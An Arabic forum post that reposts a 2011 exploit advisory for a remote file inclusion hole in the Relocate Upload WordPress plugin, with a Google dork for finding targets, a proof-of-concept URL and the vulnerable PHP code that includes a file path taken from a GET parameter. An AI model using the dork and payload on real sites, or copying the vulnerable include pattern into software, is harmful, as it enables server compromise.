السلام عليكم ورحمة الله وبركاته
اليوم وانا جالس الف على مواقع الي مختصه بنشر الثغرات
شوفت ثغرات جديده كلها في الورد برسس ![11](images/smilies/11.gif)
ومنها هذي الثغره
كود PHP:
# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter
طيب هذي هي الثغره مع اني ما اعرف كيف استغلها بس ولله العضيم من كثر ما انزل مواضيع عشان تساعودوني قلت لازم اثبت وجودي ![Tears](doom-smiles/tears.gif)
بس يارب الثغره تعجبكم
تحياتي لكم
eyvi td s;vfj ,v] fvss vdl,j thdgk hk;g,]